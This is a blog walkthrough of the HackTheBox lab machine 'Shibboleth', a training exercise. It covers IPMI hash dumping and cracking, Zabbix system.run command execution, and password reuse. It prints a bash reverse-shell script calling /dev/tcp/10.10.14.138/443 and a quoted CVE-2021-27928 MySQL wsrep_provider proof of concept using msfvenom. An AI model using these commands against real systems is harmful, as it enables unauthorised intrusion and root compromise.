<!DOCTYPE html><html lang="en"mode="dark"><!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><!-- i18n for `_javascript/utils/timeago.js` -->
    <meta name="day-prompt" content="days ago">
    <meta name="hour-prompt" content="hours ago">
    <meta name="minute-prompt" content="minutes ago">
    <meta name="justnow-prompt" content="just now"><!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="Shibboleth - HackTheBox" />
<meta property="og:locale" content="en" />
<meta name="description" content="Shibboleth is a relatively easy medium linux box. It’s running an instance of Zabbix which you can identify by bruteforcing for hidden subdomains. Once discovered, you need to exploit an ASF-RMCP/IPMI service running on UDP port 623 to extract and crack the hash of an administrator, which will give you access to the Zabbix dashboard. The box itself is configured as a Zabbix agent, so you can use this to gain code execution. Once inside, you will be moving laterally to another user through password reuse, and gain root access to the box thanks to a vulnerable MySQL service." />
<meta property="og:description" content="Shibboleth is a relatively easy medium linux box. It’s running an instance of Zabbix which you can identify by bruteforcing for hidden subdomains. Once discovered, you need to exploit an ASF-RMCP/IPMI service running on UDP port 623 to extract and crack the hash of an administrator, which will give you access to the Zabbix dashboard. The box itself is configured as a Zabbix agent, so you can use this to gain code execution. Once inside, you will be moving laterally to another user through password reuse, and gain root access to the box thanks to a vulnerable MySQL service." />
<link rel="canonical" href="https://4g3nt47.github.io/posts/hackthebox/shibboleth.html" />
<meta property="og:url" content="https://4g3nt47.github.io/posts/hackthebox/shibboleth.html" />
<meta property="og:site_name" content="4g3nt47" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-04-02T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Shibboleth - HackTheBox" />
<meta name="twitter:site" content="@UmarAbdoul" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"@type":"BlogPosting","headline":"Shibboleth - HackTheBox","dateModified":"2022-04-02T00:00:00+01:00","url":"https://4g3nt47.github.io/posts/hackthebox/shibboleth.html","datePublished":"2022-04-02T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://4g3nt47.github.io/posts/hackthebox/shibboleth.html"},"description":"Shibboleth is a relatively easy medium linux box. It’s running an instance of Zabbix which you can identify by bruteforcing for hidden subdomains. Once discovered, you need to exploit an ASF-RMCP/IPMI service running on UDP port 623 to extract and crack the hash of an administrator, which will give you access to the Zabbix dashboard. The box itself is configured as a Zabbix agent, so you can use this to gain code execution. Once inside, you will be moving laterally to another user through password reuse, and gain root access to the box thanks to a vulnerable MySQL service.","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<title>Shibboleth - HackTheBox | 4g3nt47
  </title><!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
--><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="4g3nt47">
<meta name="application-name" content="4g3nt47">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">
<!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA --><!-- Bootstrap -->
  <link rel="stylesheet" href="/assets/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="/assets/css/all.min.css"><!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet"
    href="/assets/css/bootstrap-toc.min.css"><!-- Manific Popup -->
  <link rel="stylesheet" href="/assets/css/magnific-popup.min.css"><!-- JavaScript -->

  <script src="/assets/js/jquery.min.js"></script>

</head>
<body data-spy="scroll" data-target="#toc"><!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end" lang="en">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto"><img src="/assets/img/avatar.png" alt="avatar" onerror="this.style.display='none'"></a>
    </div>

    <div class="site-title mt-3">
      <a href="/">4g3nt47</a>
    </div>
    <div class="site-subtitle font-italic">Welcome to my infosec blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs --><li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i><span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i><span>TAGS</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i><span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i><span>ABOUT</span>
      </a>
    </li> <!-- .nav-item --></ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"><a href="https://github.com/4g3nt47" aria-label="github"target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a><a href="https://twitter.com/UmarAbdoul" aria-label="twitter"target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a><a href="javascript:location.href = 'mailto:' + ['aufaruq02','gmail.com'].join('@')" aria-label="email">
        <i class="fas fa-envelope"></i>
      </a><a href="/rss/feed.xml" aria-label="rss">
        <i class="fas fa-rss"></i>
      </a></div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->
<!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb"><span>
            <a href="/">
              Home
            </a>
          </span><span>Shibboleth - HackTheBox</span></span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">Post</div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>
<div id="main-wrapper">
      <div id="main">

        <div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
  Refactor the HTML structure.
--><!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
--><!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
--><!-- Add attribute 'hide-bullet' to the checkbox list --><!-- images --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add header for code snippets --><!-- Create heading anchors --><!-- return -->

<h1 data-toc-skip>Shibboleth - HackTheBox</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>By
    <em><a href="https://twitter.com/UmarAbdoul">Umar Abdul</a></em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted<!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeago"
    date="2022-04-02 00:00:00 +0100"data-toggle="tooltip"
      data-placement="bottom"
      title="Sat, Apr  2, 2022, 12:00 AM +0100">Apr  2, 2022</em>
</span>

      <!-- lastmod date --><!-- read time --><!--
  Calculate the post's reading time, and display the word count in tooltip
 --><!-- words per minute  --><!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1157 words">
  <em>6 min</em> read</span>
<!-- page views --></div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><strong>Shibboleth</strong> is a relatively easy medium linux box. It’s running an instance of <em>Zabbix</em> which you can identify by bruteforcing for hidden subdomains. Once discovered, you need to exploit an ASF-RMCP/IPMI service running on UDP port <strong>623</strong> to extract and crack the hash of an administrator, which will give you access to the Zabbix dashboard. The box itself is configured as a Zabbix agent, so you can use this to gain code execution. Once inside, you will be moving laterally to another user through password reuse, and gain root access to the box thanks to a vulnerable MySQL service.</p>

<p><br /></p>

<h3 id="info">Info<a href="#info" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p><img data-src="/assets/img/20211113204711.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/20211113204757.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<hr />
<h3 id="recon">Recon<a href="#recon" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<pre><code class="language-raw"># Nmap 7.70 scan initiated Sat Nov 13 20:49:39 2021 as: nmap -sC -sV -oN nmap.txt -v 10.10.11.124
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.24s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 13 20:50:24 2021 -- 1 IP address (1 host up) scanned in 45.09 seconds
</code></pre>

<h4 id="web">Web<a href="#web" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>

<p><img data-src="/assets/img/20211113205454.png" alt="" data-proofer-ignore></p>

<p>Attempt to send an email using the contact-us form showed an error;</p>

<p><img data-src="/assets/img/20211113211043.png" alt="" data-proofer-ignore></p>

<p>Bruteforcing for subdomains with <code class="language-plaintext highlighter-rouge">ffuf</code> discovered 3;</p>

<p><img data-src="/assets/img/20211113210249.png" alt="" data-proofer-ignore></p>

<p>All the three subdomains show the same page;</p>

<p><img data-src="/assets/img/20211113210547.png" alt="" data-proofer-ignore></p>

<p>Hovering on the <em>help</em> link below the login form showed a URL to an online documentation that revealed the version number of <em>Zabbix</em>, which is <strong>5.0</strong>. Googling revealed a couple of vulnerabilities that require no authentication, but none of the ones I tested worked.</p>

<p>I was stuck at this for quite a while before remembering to do a UDP scan on the host. This is something I always completely forget to do, which should have been obvious since NMAP only discovered one TCP port on the target. Running <code class="language-plaintext highlighter-rouge">nmap</code> in UDP mode, I got a hit;</p>

<p><img data-src="/assets/img/20211114120214.png" alt="" data-proofer-ignore></p>

<p>Service scan with <code class="language-plaintext highlighter-rouge">nmap</code> identified it as <em>asf-rmcp</em>, which according to <em>Tenable</em>, is;</p>

<blockquote>
  <p>ASF is a DMTF standard that provides a remote control and alerting interface between management consoles and ASF-aware hosts. RMCP is <strong>a network protocol used by a management console to remotely control an ASF-aware</strong> host.</p>
</blockquote>

<p>Googling more about the service, the site <em>https://book.hacktricks.xyz</em> has some notes on it;</p>

<p><img data-src="/assets/img/20211114121645.png" alt="" data-proofer-ignore></p>

<p>Running the metasploit module showed above, I got a hash for a user named <em>Administrator</em>;</p>

<p><img data-src="/assets/img/20211114121835.png" alt="" data-proofer-ignore></p>

<p>Feeding the hash to <code class="language-plaintext highlighter-rouge">john</code>, it had no trouble cracking it (<code class="language-plaintext highlighter-rouge">ilovepumkinpie1</code>);</p>

<p><img data-src="/assets/img/20211114122027.png" alt="" data-proofer-ignore></p>

<p>Using the password, I was able to login to the <em>Zabbix</em> admin dashboard;</p>

<p><img data-src="/assets/img/20211114152359.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<hr />
<h3 id="foothold">Foothold<a href="#foothold" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>I have never worked with <em>Zabbix</em> before doing this box, so I had to read quite a bit on how it works. It’s basically a monitoring system used to monitor hosts, also referred to as Zabbix agents. In the <em>Zabbix</em> dashboard, there is an agent with the name <em>shibboleth.htb</em>;</p>

<p><img data-src="/assets/img/20211114161812.png" alt="" data-proofer-ignore></p>

<p>I learned that an “item”, which contain a “key”, can be added to an agent, and can be used to automate tasks that need to be performed after a defined interval. The key <code class="language-plaintext highlighter-rouge">system.run[]</code> is of interest to me as it can be used to run shell commands on an agent. Going to the <em>items</em> tab, I was given an option to create a key. So I created one that will ping my attack host after every one minute, and setup <code class="language-plaintext highlighter-rouge">tcpdump</code> to look for ICMP packets. It worked;</p>

<p><img data-src="/assets/img/20211114162432.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/20211114162545.png" alt="" data-proofer-ignore></p>

<p>After saving the item, I got a callback after a moment;</p>

<p><img data-src="/assets/img/20211114162714.png" alt="" data-proofer-ignore></p>

<p>Adding a bash reverse shell in the <code class="language-plaintext highlighter-rouge">system.run[]</code> key works, but exited immediately after the shell has been spawned. I assumed this is because <em>Zabbix</em> is killing the spawned process, so I wrote a bash script named <code class="language-plaintext highlighter-rouge">shell.sh</code> that spawn a bash reverse shell as a background thread, download it on the host using <code class="language-plaintext highlighter-rouge">curl</code> , and execute it (I used the <code class="language-plaintext highlighter-rouge">test</code> button showed when creating an <code class="language-plaintext highlighter-rouge">Item</code> in <em>Zabbix</em> to run the command right away);</p>

<div class="language-bash highlighter-rouge"><div class="code-header"><span label-text="Shell"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="c">#!/bin/bash</span>

<span class="c"># Spawn the reverse shell in a background thread.</span>
bash <span class="nt">-i</span> <span class="o">&gt;</span>&amp; /dev/tcp/10.10.14.138/443 0&gt;&amp;1 &amp;
<span class="c"># Exit the main thread before Zabbix kills it :)</span>
<span class="nb">exit </span>0
</pre></td></tr></tbody></table></code></div></div>

<p>I got a stable reverse shell after that as the user <code class="language-plaintext highlighter-rouge">zabbix</code>;</p>

<p><img data-src="/assets/img/20211116172203.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<hr />
<h3 id="privesc">PrivEsc<a href="#privesc" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>There is a user account named <code class="language-plaintext highlighter-rouge">ipmi-svc</code> on the host. Testing the password <code class="language-plaintext highlighter-rouge">ilovepumkinpie1</code> (which is the password for the Zabbix administrator) gave me access to the account, and the user flag;</p>

<p><img data-src="/assets/img/20211116172527.png" alt="" data-proofer-ignore></p>

<p>The user does not have any sudo access. <code class="language-plaintext highlighter-rouge">netstat</code> showed a MySQL service running locally on the host. So I started going through config files, and found a credential in <code class="language-plaintext highlighter-rouge">/etc/zabbix/zabbix_server.conf</code>;</p>

<p><img data-src="/assets/img/20211116173102.png" alt="" data-proofer-ignore></p>

<p>Using the credential, I was able to access the Zabbix database locally, and found <strong>3</strong> hashes in a table named <code class="language-plaintext highlighter-rouge">users</code>;</p>

<p><img data-src="/assets/img/20211116173407.png" alt="" data-proofer-ignore></p>

<p>The hash highlighted above is for a password I already have, and the one for the user <code class="language-plaintext highlighter-rouge">Zabbix</code> could not be cracked after <strong>+30</strong> minutes of bruteforce with <code class="language-plaintext highlighter-rouge">john</code>. So I moved on.</p>

<p>Checking the privileges of the <code class="language-plaintext highlighter-rouge">zabbix</code> MySQL user;</p>

<p><img data-src="/assets/img/20211116174547.png" alt="" data-proofer-ignore></p>

<p>Version number of MySQL components;</p>

<p><img data-src="/assets/img/20211116174652.png" alt="" data-proofer-ignore></p>

<p>Searching the version numbers using <code class="language-plaintext highlighter-rouge">searchsploit</code>, an exploit was found for the entry highlighted above;</p>

<p><img data-src="/assets/img/20211116175008.png" alt="" data-proofer-ignore></p>

<div class="language-bash highlighter-rouge"><div class="code-header"><span label-text="Shell"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="c"># Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution</span>
<span class="c"># Date: 03/18/2021</span>
<span class="c"># Exploit Author: Central InfoSec</span>
<span class="c"># Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL</span>
<span class="c"># Tested on: Linux</span>
<span class="c"># CVE : CVE-2021-27928</span>

<span class="c"># Proof of Concept:</span>

<span class="c"># Create the reverse shell payload</span>
msfvenom <span class="nt">-p</span> linux/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>&lt;ip&gt; <span class="nv">LPORT</span><span class="o">=</span>&lt;port&gt; <span class="nt">-f</span> elf-so <span class="nt">-o</span> CVE-2021-27928.so

<span class="c"># Start a listener</span>
nc <span class="nt">-lvp</span> &lt;port&gt;

<span class="c"># Copy the payload to the target machine (In this example, SCP/SSH is used)</span>
scp CVE-2021-27928.so &lt;user&gt;@&lt;ip&gt;:/tmp/CVE-2021-27928.so

<span class="c"># Execute the payload</span>
mysql <span class="nt">-u</span> &lt;user&gt; <span class="nt">-p</span> <span class="nt">-h</span> &lt;ip&gt; <span class="nt">-e</span> <span class="s1">'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Using the steps outlined above, I generated an <code class="language-plaintext highlighter-rouge">elf</code> reverse shell, download it on the host using <code class="language-plaintext highlighter-rouge">wget</code>, and exploit the flaw to gain root access to the box;</p>

<p><img data-src="/assets/img/20211116175800.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/20211116175822.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/20211116175839.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<hr />
<h3 id="summary">Summary<a href="#summary" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<ul>
  <li>Identified a web service on the host on port <strong>80</strong> using <code class="language-plaintext highlighter-rouge">nmap</code></li>
  <li>Found <em>Zabbix</em> installation on the host by bruteforcing with <code class="language-plaintext highlighter-rouge">ffuf</code></li>
  <li>Identified an <code class="language-plaintext highlighter-rouge">asf-rmcp</code> service running on UDP port <strong>623</strong></li>
  <li>Used <code class="language-plaintext highlighter-rouge">auxiliary/scanner/ipmi/ipmi_dumphashes</code> metasploit module, and obtained the password hash of the user <code class="language-plaintext highlighter-rouge">Administrator</code>. Cracking it gave me access to the admin dashboard of Zabbix.</li>
  <li>Inside <em>Zabbix</em> dashboard;
    <ul>
      <li>Found a Zabbix agent with the name <code class="language-plaintext highlighter-rouge">shibboleth.htb</code></li>
      <li>Spawned a shell on it using <code class="language-plaintext highlighter-rouge">system.run[]</code> <em>Item</em> key, which gave me access to the box as <code class="language-plaintext highlighter-rouge">zabbix</code> user.</li>
    </ul>
  </li>
  <li>Inside the box as <code class="language-plaintext highlighter-rouge">zabbix</code>;
    <ul>
      <li>Identified a local user account with the username <code class="language-plaintext highlighter-rouge">ipmi-svc</code>.</li>
      <li>Gained access to the account due to password reuse.</li>
    </ul>
  </li>
  <li>Inside the box as <code class="language-plaintext highlighter-rouge">ipmi-svc</code>;
    <ul>
      <li>Found a credential for the local MySQL service used by the Zabbix installation.</li>
      <li>Identified a vulnerable component used by the server.</li>
      <li>Found an exploit using <code class="language-plaintext highlighter-rouge">searchsploit</code>, which gave me root access to the box.</li>
    </ul>
  </li>
</ul>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories --><div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i><a href='/categories/hackthebox/'>hackthebox</a></div><!-- tags --><div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i><a href="/tags/hackthebox/"
          class="post-tag no-text-decoration" >hackthebox</a><a href="/tags/linux/"
          class="post-tag no-text-decoration" >linux</a><a href="/tags/web/"
          class="post-tag no-text-decoration" >web</a><a href="/tags/zabbix/"
          class="post-tag no-text-decoration" >zabbix</a><a href="/tags/udp/"
          class="post-tag no-text-decoration" >udp</a><a href="/tags/ipmi/"
          class="post-tag no-text-decoration" >ipmi</a><a href="/tags/mysql/"
          class="post-tag no-text-decoration" >mysql</a><a href="/tags/wsrep/"
          class="post-tag no-text-decoration" >wsrep</a><a href="/tags/metasploit/"
          class="post-tag no-text-decoration" >metasploit</a><a href="/tags/asf-rmcp/"
          class="post-tag no-text-decoration" >asf-rmcp</a></div><div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a> by the author.</div><!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons"><a href="https://twitter.com/intent/tweet?text=Shibboleth - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/shibboleth.html" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a><a href="https://www.facebook.com/sharer/sharer.php?title=Shibboleth - HackTheBox - 4g3nt47&u=https://4g3nt47.github.io/posts/hackthebox/shibboleth.html" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a><a href="https://telegram.me/share?text=Shibboleth - HackTheBox - 4g3nt47&url=https://4g3nt47.github.io/posts/hackthebox/shibboleth.html" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a><i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        title-succeed="Link copied successfully!">
    </i>

  </span>
</div>
</div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->

</div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

    <div class="access"><!--<div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3"><a class="post-tag" href="/tags/hackthebox/">hackthebox</a><a class="post-tag" href="/tags/linux/">linux</a><a class="post-tag" href="/tags/web/">web</a><a class="post-tag" href="/tags/static-analysis/">static analysis</a><a class="post-tag" href="/tags/command-injection/">command injection</a><a class="post-tag" href="/tags/custom-exploitation/">custom exploitation</a><a class="post-tag" href="/tags/dvwa/">dvwa</a><a class="post-tag" href="/tags/python/">python</a><a class="post-tag" href="/tags/rce/">rce</a><a class="post-tag" href="/tags/sql-injection/">sql injection</a></div>
  </div>-->
    </div><!-- BS-toc.js will be loaded at medium priority -->
<script src="/assets/js/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div></div>

</div>

<!-- tail --><div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  --><!-- An random integer that bigger than 0  --><!-- Equals to TAG_SCORE / {max_categories_hierarchy}  --><!-- Fill with the other newlest posts  --><div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
